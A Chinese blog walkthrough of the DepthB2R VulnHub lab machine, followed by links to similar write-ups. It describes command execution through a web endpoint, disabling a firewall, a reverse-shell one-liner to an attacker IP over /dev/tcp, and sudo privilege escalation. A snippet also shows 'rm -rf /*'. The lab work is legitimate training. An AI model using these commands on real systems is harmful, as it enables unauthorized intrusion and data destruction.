DepthB2R靶机

于 2024-08-04 22:32:00 发布
阅读量129 收藏
点赞数 3
文章标签: 服务器 apache linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74232792/article/details/140913389
版权

Getshell

主机发现,端口目录扫描

访问主页

尝试弱口令登录时,发现了一组账号密码,但并没有登录成功

访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令

ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙

关闭防火墙,并反弹shell,ssh bill@localhost bash -i >& /dev/tcp/192.168.81.129/9999 0>&1,kali开启监听

普通用户,开始提权

提权

尝试sudo提权,sudo -l查看支持的sudo命令,sudo su ,提权成功

.南捱
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub DepthB2R 靶机渗透
Shadow的博客
04-08 363
DepthB2R 靶机渗透 目标:得到root权限 作者:shadow 时间:2021-04-08 请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 主机ip为172.16.1.22 nmap -p- -A -T5 172.16.1.22 只开放了8080端口,我们看看是什么 二、web渗透 没什么发现,试试nikto扫描下 ni
DepthB2R靶机复现
weixin_52956666的博客
08-02 174
访问192.168.112.149:8080。靶机IP为192.168.112.149。输入ls -l /home查看用户。发现失败,感觉像是ssh服务被关闭。这个靶机比较友好,不需要进行设置。输入ls -l发现存在命令执行。sudo -l查看免密操作。拼接/test.jsp。尝试进行反弹shell。sudo su直接提权。在kali上开启监听。
DepthB2R靶机渗透测试
最新发布
weixin_58786230的博客
08-03 119
【代码】DepthB2R靶机渗透测试。
vulnhub系列:DepthB2R
jq_j37的博客
08-03 163
vulnhub系列:DepthB2R靶机,打靶文章
【vulnhub】Depth靶机
wbplife的博客
08-02 310
输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。ls -l /home 查看到home目录内容,发现bill用户。存在系统命令执行漏洞,进行利用,反弹shell尝试失败。提示我们输入 ls -l /tmp 测试一下。,发现所有用户(ALL)都有sudo权限,运行环境:VMware运行该虚拟机。有一个目录/test.jsp。
Vulnhub靶机 Depth(渗透测试)
2301_78721909的博客
07-29 313
Vulnhub靶机 Depth(from wuhu)
【vulnhub靶场】Depth:1靶机提权
qq_46421742的博客
07-28 189
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
linux 常用的命令
caoyanzhi的博客
08-02 738
一、文件和目录操作 ls:列出目录内容。 cd:切换当前工作目录。 pwd:显示当前工作目录的绝对路径。 mkdir:创建新目录。 rmdir:删除空目录。 rm:删除文件或目录(使用-r选项递归删除目录)。 cp:复制文件或目录。 mv:移动或重命名文件或目录。 touch:创建空文件或修改文件时间戳。 find:在目录树中搜索文件,并执行指定的操作。 二、文本查看和处理 cat:查看文件内容,并可以将多个文件内容合并后输出。 more:分页显示文件内容。 less:与more类
Nginx常用命令(Linux)
hanzhuhuaa的博客
08-03 195
nginx 常用命令。
Apache Kafka深入】Kafka集群的配置与管理
weixin_39372311的博客
08-03 552
由于其高吞吐量、低延迟、容错性和持久性,Kafka 被广泛应用于日志收集、消息系统、流处理、监控数据等领域。本文将详细介绍 Kafka 集群的配置与管理,帮助你更好地部署和运维 Kafka 集群。可以使用 Kafka 自带的 JMX(Java Management Extensions)监控工具,或者使用第三方监控工具(如 Prometheus、Grafana)来监控 Kafka 集群的运行状态。通过上述方法,可以有效配置和管理 Kafka 集群,确保其高效稳定地运行。是存储 Kafka 日志数据的目录,
Linux文件与目录管理命令 ls cp rm mv使用方法
云计算课代表
08-03 476
Linux文件与目录的管理基本上包括:显示属性、复制、删除、移动文件与目录等,由于文件与目录的管理不仅重要而且操作频繁,所以本文列举一些常用的管理命令。
Linux初学基本命令
yuan20010401的博客
07-25 1250
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux小组件:gcc
Au_ust的博客
08-02 592
在计算机语言发展过程,人们一直都在用二进制编程。就像纸带八音盒一样,在纸带上打孔,有孔就是1,没孔就是0后来有了汇编语言, 面向机器的语言设计,他只是将机器语言做了简单编译,所以并没有根本上解决机器语言的特定性后来发明了C语言,更适合两脚兽使用的语言,但是机器又看不懂,于是就需要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值